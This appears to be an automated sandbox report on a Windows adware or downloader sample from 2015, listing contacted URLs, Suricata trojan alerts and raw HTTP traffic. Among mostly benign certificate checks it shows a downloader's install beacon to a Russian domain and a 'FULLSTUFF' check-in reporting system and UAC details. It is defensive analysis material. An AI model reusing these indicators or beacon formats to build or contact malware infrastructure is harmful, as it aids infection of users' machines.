hxxp://clients1.google.com/ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCBB4deWARfX0
hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEAxNF3PJUX7iAOhAP2oGxcI=
hxxp://gomail.radar.imgsmail.ru/update?rnd=451798608657&p=gomail3&t=gomail_main&v=0&i=renderdocument:782,static:550,jsinit:1
hxxp://mail.yandex.ua/?from=dist_svz
hxxp://sr.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR0JBRnBp/14Jg/Xj4aa6BlKlQVdQQUAVmr5906C1mmZGPWzyAHV9WR52oCEBrIXreuw1E82A2FOF7P0gg=
hxxp://s7.addthis.com/static/r07/widget/css/widget015.top.svg.css
hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQMgSk4dLKWKRB+2DViUmQEUw3ggwQUDURcFlNEwYJ+HSCrJfQBY9i+eaUCEBJb7jD8sX/Xvx/0GcknQyc=
hxxp://get.geo.opera.com.global.prod.fastly.net/res/servicefiles/ab-tests/20150113-4.json
hxxp://finance.yahoo.com/webservice/v1/symbols/allcurrencies/quote?format=json&random=0.9386969780291706
hxxp://s7.addthis.com/static/r07/menu174.js
hxxp://www.booking.com/index.html?aid=343341&label=operasoft-sdO15-343341-&utm_source=Opera&utm_medium=web&utm_campaign=sdO15
hxxp://b.scorecardresearch.com/b?c1=7&c2=2000001&c3=1&rn=1uaxbdb&c7=http://go.mail.ru/?osd=1&c8=ÐŸÐ¾Ð¸ÑÐº Mail.Ru&cv=1.7

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

SURICATA UDPv4 invalid checksum
SURICATA IPv4 invalid checksum
ET TROJAN Kazy Checkin
ET TROJAN W32/Fullstuff Initial Checkin
ET TROJAN Suspicious User-Agent (FULLSTUFF)
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected

Traffic

GET /redot.gif?id=nSc1Xb_XHWGE489G2VJWSZPcDkF6pA7KiGusxyUX4pH.Z7/tstamp=1424684153535 HTTP/1.1

Host: mailua.hit.gemius.pl

Connection: keep-alive

Accept: image/webp,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Referer: hXXp://go.mail.ru/?osd=1

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8

Cookie: Gtest=KlSqSMaGQMQGX5VQ-PoLpgfRssGMXP8cRRgG; Gdyn=KlGSeRXGQMQGX5VQ-PoLpgfRssGMXP8cR86SssX6nsGfGSfpPb2xxjGoxcxSY8CBI8l8MG..


HTTP/1.1 200 OK

Date: Mon, 23 Feb 2015 09:35:34 GMT

Expires: Sun, 22 Feb 2015 09:35:34 GMT

Server: GHC

Accept-Ranges: none

Pragma: no-cache

Cache-Control: no-store, no-cache, must-revalidate, max-age=0

Set-Cookie: Gtest=; Domain=hit.gemius.pl; Path=/; Expires=Fri, 1 Jan 2010 00:00:00 GMT

Set-Cookie: Gdyn=KlGH7MMGQMQGX5VQ-PoLpgfRssGMAe1hYsgxLl8exgLi98QsG0miGMFxHaQGYzaX0Ly8N6aRG8MS; Domain=hit.gemius.pl; Path=/; Expires=Fri, 19 Jun 2020 00:00:00 GMT

P3P: CP="NOI DSP COR NID PSAo OUR IND"

Connection: keep-alive

Keep-Alive: timeout=2

Content-Type: image/gif

Content-Length: 43
GIF89a.............!.......,...........D..;HTTP/1.1 200 OK..Date: Mon,
 23 Feb 2015 09:35:34 GMT..Expires: Sun, 22 Feb 2015 09:35:34 GMT..Ser
ver: GHC..Accept-Ranges: none..Pragma: no-cache..Cache-Control: no-sto
re, no-cache, must-revalidate, max-age=0..Set-Cookie: Gtest=; Domain=h
it.gemius.pl; Path=/; Expires=Fri, 1 Jan 2010 00:00:00 GMT..Set-Cookie
: Gdyn=KlGH7MMGQMQGX5VQ-PoLpgfRssGMAe1hYsgxLl8exgLi98QsG0miGMFxHaQGYza
X0Ly8N6aRG8MS; Domain=hit.gemius.pl; Path=/; Expires=Fri, 19 Jun 2020 
00:00:00 GMT..P3P: CP="NOI DSP COR NID PSAo OUR IND"..Connection: keep
-alive..Keep-Alive: timeout=2..Content-Type: image/gif..Content-Length
: 43..GIF89a.............!.......,...........D..;..

GET //MEIwQDA+MDwwOjAJBgUrDgMCGgUABBQdI2+OBkuXH93foRUj4a7lAr4rGwQUOpqFBxBnKLbv9r0FQW4gwZTaD94CAQc= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.godaddy.com


HTTP/1.1 200 OK

Date: Mon, 23 Feb 2015 09:35:38 GMT

Server: Apache

Content-Transfer-Encoding: Binary

Cache-Control: max-age=117097, public, no-transform, must-revalidate

Last-Modified: Mon, 23 Feb 2015 07:49:58 GMT

Expires: Tue, 24 Feb 2015 19:49:58 GMT

ETag: "0d29ed2d8ebbe019ce0be25303e6d65c0419fc0c"

Content-Length: 1853

Connection: close

Content-Type: application/ocsp-response
0..9......20..... .....0......0...0..-...0..1.0...U....US1.0...U....Ar
izona1.0...U....Scottsdale1.0...U....GoDaddy.com, LLC1-0 ..U...$http:/
/certs.godaddy.com/repository/100...U...'Go Daddy Root Validation Auth
ority - G2..20150223074958Z0d0b0:0... .........#o..K......#..... ...:.
...g(.....An ............20150223074958Z....20150224194958Z0...*.H....
........... u.,=..ag..TKL.p.....8"..$....VOL.e...)...r0...p@..<..P.
T..C.<..$..'2.. ......K#v<.a..|..g....}RO.E.U..C......'i..n..75.
[m..Qv.>q....o..........-2gk&......b.S.(. W...}......6.`#.J.y..N.Z.
K9x.ep..*.z.x-.&...,Ci.6..V..........6...lJ.<...p....Xr.....6.G...w
....0...0...0...........0...*.H........0..1.0...U....US1.0...U....Ariz
ona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.110/..U...(Go Dadd
y Root Certificate Authority - G20...140401070000Z..150401070000Z0..1.
0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.c
om, LLC1-0 ..U...$hXXp://certs.godaddy.com/repository/100...U...'Go Da
ddy Root Validation Authority - G20.."0...*.H.............0...........
~........l&nbOp..|%..T8..v...p.........(..........|...L..d3z.......)..
."y1U^N.t...].a..v...d.$3H1T_.;.<~.*o...VWC....u.....{.7.8*Y...J.9.
l.Ur..2-.2.v....0E...d;cJ...5I..3.5.........R..^.c~O% ..)...P....H;...
/.."c..{.VG...?...h...b3... i......-.B.Q%. ............0...0...U......
.0.0...U...........0...U.%..0... ......... .......0...U.......v6Q.lE3c
|l[.`..~.[.0...U.#..0...:....g(.....An .....0... .....0......05..U....
0,0*.(.&.$hXXp://crl.godaddy.com/gdroot-g2.crl0M..U. .F0D0B..`.H..<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSOJaE2H4hHYQzP74hlLuO41NG+EAQUHsWxLH2H2gJofCW8DAeEP7bP3vECEFtqk1INVLZiatsa9bb94KA= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.comodoca.com


HTTP/1.1 200 OK

Date: Mon, 23 Feb 2015 09:36:16 GMT

Server: Apache/2.2.22 (Debian)

Last-Modified: Sun, 22 Feb 2015 17:45:50 GMT

Expires: Thu, 26 Feb 2015 17:45:50 GMT

ETag: BB783C12A49D9AEBD8547FC56E38C0B426023959

Cache-Control: max-age=287973,public,no-transform,must-revalidate

X-OCSP-Reponder-ID: h6edcaocsp7

Content-Length: 471

Connection: close

Content-Type: application/ocsp-response
0..........0..... .....0......0...0.........,}...h|%....?......2015022
2174550Z0s0q0I0... .........%.6..Ga....e............,}...h|%....?.....
.[j.R.T.bj...........20150222174550Z....20150226174550Z0...*.H........
........x3..7Lo;..1....9.....ts.U...v..k.....1..."Q.$.q........<(..
..Y.F7[.....W.H..t.(X..f....x.. S..c$......4.7R.....Nl.c..Q. /.|......
.}.g.....to......../.....m.......8 .z.`..b..b..hzU..(..Y..V..2.....Qo.
..%.\YU..0.c$.xE.....>mzu0~Q.v).>e.Z..nL....^.t?6\m..n..

GET /crls/secureca.crl HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: crl.geotrust.com


HTTP/1.1 200 OK

Server: Apache

ETag: "ceac79725e6b8f1053bdd3c3e8e6a7d4:1424681721"

Last-Modified: Mon, 23 Feb 2015 08:55:21 GMT

Date: Mon, 23 Feb 2015 09:31:46 GMT

Content-Length: 856

Connection: keep-alive

Content-Type: application/pkix-crl

0..T0...0...*.H........0N1.0...U....US1.0...U....Equifax1-0 ..U...$Equ
ifax Secure Certificate Authority..150223084300Z..150305084300Z0..<
0....X...140427081922Z0....v...140618150003Z0........140429180917Z0...
.....140709194633Z0........140416233935Z0........140521155053Z0.....).
.140617185515Z0....Bf..120627171053Z0.....3..020515130611Z0.....#..140
606204021Z0........100729164439Z0........140606222139Z0....%...0205141
81157Z0........140725020038Z0........100729164732Z0....M\..14043000044
2Z0.....-..140617185011Z0....uU..150118022133Z0....V...140624123102Z0.
.......120627171025Z0........100301134531Z0........140618143256Z0.....
...120627171017Z0.....>..140711125531Z0....[...100730213120Z0....j.
..140226123519Z0...*.H............{...Z....u....qN.5.....,.......r.}..
..iB.`.2...D=.....Da....C....fV. @2.N.S.WM..F.Y..s&./...i.0.)Z!..s...D
....%Q..fk.\.a.6..Y[.tHTTP/1.1 200 OK..Server: Apache..ETag: "ceac7972
5e6b8f1053bdd3c3e8e6a7d4:1424681721"..Last-Modified: Mon, 23 Feb 2015 
08:55:21 GMT..Date: Mon, 23 Feb 2015 09:31:46 GMT..Content-Length: 856
..Connection: keep-alive..Content-Type: application/pkix-crl..0..T0...
0...*.H........0N1.0...U....US1.0...U....Equifax1-0 ..U...$Equifax Sec
ure Certificate Authority..150223084300Z..150305084300Z0..<0....X..
.140427081922Z0....v...140618150003Z0........140429180917Z0........140
709194633Z0........140416233935Z0........140521155053Z0.....)..1406171
85515Z0....Bf..120627171053Z0.....3..020515130611Z0.....#..14060620402
1Z0........100729164439Z0........140606222139Z0....%...02051418115

<<< skipped >>>

GET /?ilc=400 HTTP/1.1

Host: VVV.yahoo.com

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 301 Redirect

Date: Mon, 23 Feb 2015 09:31:43 GMT

Via: http/1.1 ir6.fp.ir2.yahoo.com (ApacheTrafficServer)

Server: ATS

Location: hXXps://VVV.yahoo.com/?ilc=400

Content-Type: text/html

Content-Language: en

Cache-Control: no-store, no-cache

Connection: keep-alive

Content-Length: 1450
<!DOCTYPE html>.<html lang="en-us"><head>.<meta h
ttp-equiv="content-type" content="text/html; charset=UTF-8">.    &l
t;meta charset="utf-8">.    <title>Yahoo</title>.    &l
t;meta name="viewport" content="width=device-width,initial-scale=1,min
imal-ui">.    <meta http-equiv="X-UA-Compatible" content="IE=edg
e,chrome=1">.    <style>.html {.    height: 100%;.}.body {.  
  background: #fafafc url(hXXps://s.yimg.com/nn/img/sad-panda-20140220
0631.png) 50% 50%;.    background-size: cover;.    height: 100%;.    t
ext-align: center;.    font: 300 18px "helvetica neue", helvetica, ver
dana, tahoma, arial, sans-serif;.}.table {.    height: 100%;.    width
: 100%;.    table-layout: fixed;.    border-collapse: collapse;.    bo
rder-spacing: 0;.    border: none;.}.h1 {.    font-size: 42px;.    fon
t-weight: 400;.    color: #400090;.}.p {.    color: #1A1A1A;.}.#messag
e-1 {.    font-weight: bold;.    margin: 0;.}.#message-2 {.    display
: inline-block;.    *display: inline;.    zoom: 1;.    max-width: 17em
;.    _width: 17em;.}.    </style>.</head>.<body>.&l
t;!-- status code : 301 -->.<!-- Error: GET -->.<table>
.<tbody><tr>.    <td>.    <img src="hXXps://s.yim
g.com/nn/img/yahoo-logo-201402200629.png" alt="Yahoo Logo">.    <
;h1 style="margin-top:20px;">Will be right back...</h1>.    &
lt;p id="message-1">Thank you for your patience.</p>.    <
p id="message-2">Our engineers are working quickly to resolve t<<< skipped >>>

GET /touch_install?name=nethost.exe?etag=bba9e197f9f68f6e3b7c53519e87cb75&hash=2d84e2b0951fc5429e36666fbea994a540c103d2f71235ccaa45e036691ac29a&stb=1&did=1497824015&ext_partner_id=&file_id=32888998&launch=bba9e197f9f68f6e3b7c53519e87cb75 HTTP/1.1

User-Agent: Downloader 7.2

Host: forces.prochristmasdom.ru

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:33:16 GMT

Content-Type: text/html

Content-Length: 0

Connection: close

X-Powered-By: PHP/5.4.37

Expires: Mon, 8 Oct 2012 01:02:03 GMT

Last-Modified: Mon, 23 Feb 2015 09:33:16 GMT

Cache-Control: no-cache, must-revalidate

Pragma: no-cache

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD/yl6nWPkczAQUe1tFz6/Oy3r9MZIaarbzRutXSFACEHYQEooXtoK7Oh+dGpo1wJI= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.thawte.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1503

content-transfer-encoding: binary

Cache-Control: max-age=445439, public, no-transform, must-revalidate

Last-Modified: Sat, 21 Feb 2015 13:17:35 GMT

Expires: Sat, 28 Feb 2015 13:17:35 GMT

Date: Mon, 23 Feb 2015 09:35:36 GMT

Connection: keep-alive
0..........0..... .....0......0...0......&Km...."....}....,.c..2015022
1131735Z0s0q0I0... ........0..k....&..p..^.X.....{[E....z.1..j..F.WHP.
.v.......:....5......20150221131735Z....20150228131735Z0...*.H........
.....@.z7..........m..I........`..R-.......P.....R.....[P.....c...:...
.z.G]@.x.1..Zn..........[8=Z........%~E.....'.......C.^f/.G..#.h2;....
B.hx...[.!.u...y.5.'6-LD........%...RXZ..G........;..Y.x.:-...........
....A..I......9@.K..!]...f....iW.i....i....~b.....J....0...0...0......
......I...*....^n...0...*.H........0..1.0...U....US1.0...U....thawte, 
Inc.1(0&..U....Certification Services Division1806..U.../(c) 2006 thaw
te, Inc. - For authorized use only1.0...U....thawte Primary Root CA0..
.141202000000Z..151216235959Z0_1.0...U....US1.0...U....thawte, Inc.190
7..U...0thawte Primary Root OCSP Responder Certificate 30.."0...*.H...
..........0.........x...F83..,.D.,2D.;JGc.|_.k.....B.7.....G}.M.s.....
S.i.Uu.h.Aq..v...4:l..U.......T7l...~vl...r....{*..........V.o..8|.B..
^.a.. ...z....x..s...\[Y....<....'> ..YC..7.zVk.$...o3..kao]c...
>C./bPX.......I..Oc.....NN......g.....,/..]......qN.....V!<.3.).
..y#.........i0g0...U.%..0... .......0... .....0......0...U.......0.0.
..U...........0!..U....0...0.1.0...U....TGV-B-2770...*.H..............
..lt..\..z. ..N.f.!.S5d?J.&....r...D........L.`.s.p...HC.L.8f... .....
....GA7......P..Z.%.../............z.n.6~I...].).....W...W\|.uya..:...
^...hW..7.Z.uc.'....:.xL...HS.....>.........5......%....3S....h....
....U....o.C.\.t.....G.._.C0(l.E9..6UTxg.gF ..;.....
<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD/yl6nWPkczAQUe1tFz6/Oy3r9MZIaarbzRutXSFACEE1fLDQIskwgzW1QfiRNyew= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.thawte.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1503

content-transfer-encoding: binary

Cache-Control: max-age=403526, public, no-transform, must-revalidate

Last-Modified: Sat, 21 Feb 2015 01:37:39 GMT

Expires: Sat, 28 Feb 2015 01:37:39 GMT

Date: Mon, 23 Feb 2015 09:35:37 GMT

Connection: keep-alive
0..........0..... .....0......0...0......&Km...."....}....,.c..2015022
1013739Z0s0q0I0... ........0..k....&..p..^.X.....{[E....z.1..j..F.WHP.
.M_,4..L .mP~$M......20150221013739Z....20150228013739Z0...*.H........
.....v.r..NB".'M....Dl\.'..^..Oy0....{.;;..H..inqC..Nk...@.;.8D...d...
.l.3...F.......*....P$v.E..*......j..A..,..g...._z.....U$vm.a..\...Wi@
...q....F..a?3...DZ.o7.....h......5jk..M/.F.%..yM..qY9.. ...a=x.V..E6.
.N...>z...:R 3.".H..{..O.0...3.$k...>.d"..V..a^..K_....0...0...0
............I...*....^n...0...*.H........0..1.0...U....US1.0...U....th
awte, Inc.1(0&..U....Certification Services Division1806..U.../(c) 200
6 thawte, Inc. - For authorized use only1.0...U....thawte Primary Root
 CA0...141202000000Z..151216235959Z0_1.0...U....US1.0...U....thawte, I
nc.1907..U...0thawte Primary Root OCSP Responder Certificate 30.."0...
*.H.............0.........x...F83..,.D.,2D.;JGc.|_.k.....B.7.....G}.M.
s.....S.i.Uu.h.Aq..v...4:l..U.......T7l...~vl...r....{*..........V.o..
8|.B..^.a.. ...z....x..s...\[Y....<....'> ..YC..7.zVk.$...o3..ka
o]c...>C./bPX.......I..Oc.....NN......g.....,/..]......qN.....V!<
;.3.)...y#.........i0g0...U.%..0... .......0... .....0......0...U.....
..0.0...U...........0!..U....0...0.1.0...U....TGV-B-2770...*.H........
........lt..\..z. ..N.f.!.S5d?J.&....r...D........L.`.s.p...HC.L.8f...
 .........GA7......P..Z.%.../............z.n.6~I...].).....W...W\|.uya
..:...^...hW..7.Z.uc.'....:.xL...HS.....>.........5......%....3S...
.h........U....o.C.\.t.....G.._.C0(l.E9..6UTxg.gF ..;.....
<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBT1uKgYjpCmJone3Avzs5JQQsaeCgQUq0TkXeyDx9nAhZ/34caXkLCMP5gCEBkhCfOEtGdvG7S9udrmGYs= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.thawte.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1402

content-transfer-encoding: binary

Cache-Control: max-age=594422, public, no-transform, must-revalidate

Last-Modified: Mon, 23 Feb 2015 06:38:33 GMT

Expires: Mon, 2 Mar 2015 06:38:33 GMT

Date: Mon, 23 Feb 2015 09:35:37 GMT

Connection: keep-alive
0..v......o0..k.. .....0.....\0..X0..............{.k@>@..7Fw ..2015
0223063833Z0s0q0I0... ...............&.......PB......D.]..............
?....!....go............20150223063833Z....20150302063833Z0...*.H.....
........#D..U.gp .cZ.... .....c...oR]....*(S..H.........Zy.....N.$...x
a.&....)..PO.Z!.....2...D..a\.....1& .;.q%.G(c.i.=....W..Tc.ip-.|v....
.@..}.F1|!\...Z.2............^K.E^.<.<.:o..I.}...].Ew.....`<.
...1.5VOU....|).W...8sWYq....*^.,|..:....,A4.^.....0.@.QP.j...&....0..
.0...0..........J.uc.%....&d.x|.0...*.H........0^1.0...U....US1.0...U.
...Thawte, Inc.1.0...U....Domain Validated SSL1.0...U....Thawte DV SSL
 CA0...141204000000Z..150304235959Z0K1.0...U....US1.0...U....Thawte, I
nc.1%0#..U....Thawte DV SSL OCSP Responder0.."0...*.H.............0...
.......PI......h?]..L[....9../..xuW........Ky...u_..y. :&.../tV.p....f
..G.Nu.......U8Y..>^%..l$.<..w.&u....#).\,z.(..L..4Ve.EC....?J.t
...K..U....!FI28.....f/..\......._..... Y....8\:[.\....vd...3o......!G
.]....><T...b....../.' .m.......<...E.`...3..w....=..a.......
..d0b0...U....0.0...U.%..0... .......0...U........0... .....0......0".
.U....0...0.1.0...U....TGV-B-24620...*.H...............m;]Z.f...(.t=..
....25N.\H.... .....m).m..G....r..VR........$.E....Z...x<1.os}.TV*.
..j'3..TNd.C...t.i.u...]..X/~...R..?O......39...K..D9....*. l...X.".&g
t;=(.<Z.[..8..v.......d....ty.T.y..c)..s..9f.......6..$z#g..=7]....
U/j..y:....i...%....h.F?[=T..I....$}......
<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQxsL2eHTbKwjJcY2gHLbXTx2GdSQQUp6KDuzRFQD381TBPErk+oQGf9tsCEAIJNvbKBTT4mOdlfu7a8FY= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.thawte.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1365

content-transfer-encoding: binary

Cache-Control: max-age=465940, public, no-transform, must-revalidate

Last-Modified: Sat, 21 Feb 2015 18:57:44 GMT

Expires: Sat, 28 Feb 2015 18:57:44 GMT

Date: Mon, 23 Feb 2015 09:35:37 GMT

Connection: keep-alive
0..Q......J0..F.. .....0.....70..30........T..I\....zk.v.*4.8..2015022
1185744Z0s0q0I0... ........1....6..2\ch.-...a.I......4E@=..0O..>...
......6...4...e~...V....20150221185744Z....20150228185744Z0...*.H.....
..........wA.....1.....A[...*.E6..........#..V.....Z..<PN.|&A....,E
.Q....^o.&.q.....!..,cY...y...... ..Yc.$.H5..k....v..lC..x.......trb4N
......J.9....k...Y......I.lr...=.KV8q.C.dl..*CW.)......W.....]{.iAE..d
|%S...=.n....S..lK...C....q.E...Uy....2...HU.c.Q..,`..Rr....z0..v0..r0
..Z.......QI...s...K!@..t.0...*.H........0<1.0...U....US1.0...U....
Thawte, Inc.1.0...U....Thawte SSL CA0...141204000000Z..150304235959Z0H
1.0...U....US1.0...U....Thawte, Inc.1"0 ..U....Thawte SSL OCSP Respond
er0.."0...*.H.............0...........1nD.D....f.!F..-..D...w.r.^...'.
.n;.s#.9]Yc..Kx.....L......E...z...\..g.35a4S......E..v t..g.....:..q.
'..............Y/.)"....5..S....f.(]b...2e... ...Z..i`..qO..G..d.x d5.
at.1\.>.O...D./..=?..{^..........T...M8.......a. y.b,..KH....)B.ph.
........*A..........d0b0...U....0.0...U.%..0... .......0...U........0.
.. .....0......0"..U....0...0.1.0...U....TGV-B-24610...*.H............
.y.....0.PU..>f...>...s..........*..^.U...N.y'?nt.-..H..o......A
...1H......|....:(..l$l:......g....Z...d.nn.....P....t.g.M./.....6f..N
>.}=@..O..3..../.....Wm$U.?.....u.|.....j..)0..k..,.(.....9..%p....
.....'a_*..J&.a......lv.....~..O./.......R.|......(V.W....<<< skipped >>>

GET /gosearch3.ico HTTP/1.1

Host: illespi.dom-upload.ru

Accept: */*


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:36:13 GMT

Content-Type: image/x-icon

Content-Length: 32038

Last-Modified: Wed, 03 Dec 2014 15:19:53 GMT

Connection: keep-alive

ETag: "547f2a19-7d26"

Accept-Ranges: bytes

............ .h...F...  .... .........00.... ..%..V...@@.... .(B...:..
(....... ..... .......................................................
.......................................o...s...s...s...s...s...t...t..
.t...t...t...t...s...m...........w...v...w...y...z...|...~............
..2.......Y....t...........x...w...z...}......................4.......
.........w...........z...y...~......3...a...V.......6.................
...y...........|...{...............................................|..
............................k...}............................~........
..M...............>...7...2...B...................................P
...........{...f...f...f...f...........|...'...................S......
.....r...f...f...f...f...............f...a...?...........V............
...f...f...f...h...........~...f...f...Q...........Y...y..............
.w...................f...f...f...T...........\...f....................
...........r...f...f...f...X...........^...f...f...x..................
.i...f...f...f...f...[...........Y...b...b...b...b...b...b...b...b...b
...b...b...b...W......................................................
......................................................................
...........(... ...@..... ............................................
......................................................................
......................................................................
......................................................................
....................................M.8.m...p...p...p...p...p...p.

<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQSBA0TLeT5Hrk8v73bcU3oAZux9AQUEUrQcznVW2kIXLo9v2SaqIscVbwCECJe6gdYhONI6dBjwD1kE+o= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: gb.symcd.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1456

content-transfer-encoding: binary

Cache-Control: max-age=474265, public, no-transform, must-revalidate

Last-Modified: Sat, 21 Feb 2015 21:17:36 GMT

Expires: Sat, 28 Feb 2015 21:17:36 GMT

Date: Mon, 23 Feb 2015 09:35:36 GMT

Connection: keep-alive
0..........0..... .....0......0...0.........b../..J.G...~.2.L..2015022
1211736Z0s0q0I0... ............-....<...qM........J.s9.[i.\.=.d....
U..."^..X..H..c.=d......20150221211736Z....20150228211736Z0...*.H.....
.........k....?y..G.M.....l..&.......m.....I|....uC.b3.Q..<Ta.{NP.I
R<............z....L.k..Q...q..;Q.`%.I..y.....,JS.-..2.#.....3.....
.].......{<.%.......@..m....d....M..'...z...6.nb.....2{d.-p.G7...?*
u0.......gNu...Q.!.k..Wv ...h.,...*j..1..........b..s....d.Y.n.....0..
.0...0..........w..X.G.&..kRiD.S0...*.H........0D1.0...U....US1.0...U.
...GeoTrust Inc.1.0...U....GeoTrust SSL CA - G20...150106000000Z..1504
06235959Z0S1.0...U....US1.0...U....GeoTrust Inc.1,0*..U...#GeoTrust SS
L CA - G2 OCSP Responder0.."0...*.H.............0.........%p.O..U{b._.
..>.f...M....y#..~iN.c......uF.!H.S.^.=...39..w.!.SPD........1%...6
'.e.....3k.)..m.......d.w2....\PMh....q>.f....v.........L...Y..~8..
.~WL..%/.q.....V.......l*.Qr......w.X:9....b...p.0....cu..........M...
..=RE...Nq...yqMtje..mj....W.z.D/..5g.k........0..0...U.......0.0...U.
%..0... .......0...U...........0... .....0......0"..U....0...0.1.0...U
....TGV-B-27550...U.#..0....J.s9.[i.\.=.d....U.0...U.........b../..J.G
...~.2.L0...*.H.............E.L.W..;..C@..?....JF;.@.J..n...........a.
^.a..)OB...|..f.../9.Q...:_-7....yG...FF...[.^.@...QCd.w......$x.....N
.4....RjP....r ......@..6t.$.2..Lb ...RZ..6.....2T|..L......z....:q!.G
..O.1....OCC:...Z1,%.H..ri...'E.(.j.....6..i.o...9...KWQ..G..0..f..>
;.*&-8-..<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQSBA0TLeT5Hrk8v73bcU3oAZux9AQUEUrQcznVW2kIXLo9v2SaqIscVbwCEE/s61qLfe5+gLSurb7nO5U= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: gb.symcd.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1456

content-transfer-encoding: binary

Cache-Control: max-age=545089, public, no-transform, must-revalidate

Last-Modified: Sun, 22 Feb 2015 16:57:49 GMT

Expires: Sun, 1 Mar 2015 16:57:49 GMT

Date: Mon, 23 Feb 2015 09:35:36 GMT

Connection: keep-alive
0..........0..... .....0......0...0.........b../..J.G...~.2.L..2015022
2165749Z0s0q0I0... ............-....<...qM........J.s9.[i.\.=.d....
U...O..Z.}.~......;.....20150222165749Z....20150301165749Z0...*.H.....
.........}.8..,..5..VSd......D.../...e....u(...>{Po.|.._y@?.}...kN?
.nC...,A.g......|.Z"......h...n..(.......Y.................O(/g..HL...
.5W..Os.O'.......'.Yi#.......6X.m..I".o.#.K.Jv}....."w.x..6.. .}...*.?
............ ...Cb.....f.z...y.h..R..%.yR.../U.%T..H..1v.....0...0...0
..........w..X.G.&..kRiD.S0...*.H........0D1.0...U....US1.0...U....Geo
Trust Inc.1.0...U....GeoTrust SSL CA - G20...150106000000Z..1504062359
59Z0S1.0...U....US1.0...U....GeoTrust Inc.1,0*..U...#GeoTrust SSL CA -
 G2 OCSP Responder0.."0...*.H.............0.........%p.O..U{b._...>
.f...M....y#..~iN.c......uF.!H.S.^.=...39..w.!.SPD........1%...6'.e...
..3k.)..m.......d.w2....\PMh....q>.f....v.........L...Y..~8...~WL..
%/.q.....V.......l*.Qr......w.X:9....b...p.0....cu..........M.....=RE.
..Nq...yqMtje..mj....W.z.D/..5g.k........0..0...U.......0.0...U.%..0..
. .......0...U...........0... .....0......0"..U....0...0.1.0...U....TG
V-B-27550...U.#..0....J.s9.[i.\.=.d....U.0...U.........b../..J.G...~.2
.L0...*.H.............E.L.W..;..C@..?....JF;.@.J..n...........a.^.a..)
OB...|..f.../9.Q...:_-7....yG...FF...[.^.@...QCd.w......$x.....N.4....
RjP....r ......@..6t.$.2..Lb ...RZ..6.....2T|..L......z....:q!.G..O.1.
...OCC:...Z1,%.H..ri...'E.(.j.....6..i.o...9...KWQ..G..0..f..>.*&-8
-..<<< skipped >>>

GET /update/2/version.txt?type=install&GUID={719968E8-AEBE-49A6-B040-FB3879941DE0}&rfr=blackbear1&standalone=1&tool=sputnik&uacenabled=0&osver=7&osbit=64&osvernum=6.1&ossp=ServicePack1&uac=0&ver=2.9.0.161&praetorian=0&qipguard=0&yabrman=0&comp_mem=2047&tool_mem=10&uacpass=1 HTTP/1.1

Host: mrds.mail.ru

Accept: */*

User-Agent: FULLSTUFF

Connection: close


HTTP/1.1 204 No Content

Server: nginx

Date: Mon, 23 Feb 2015 09:32:18 GMT

Connection: close

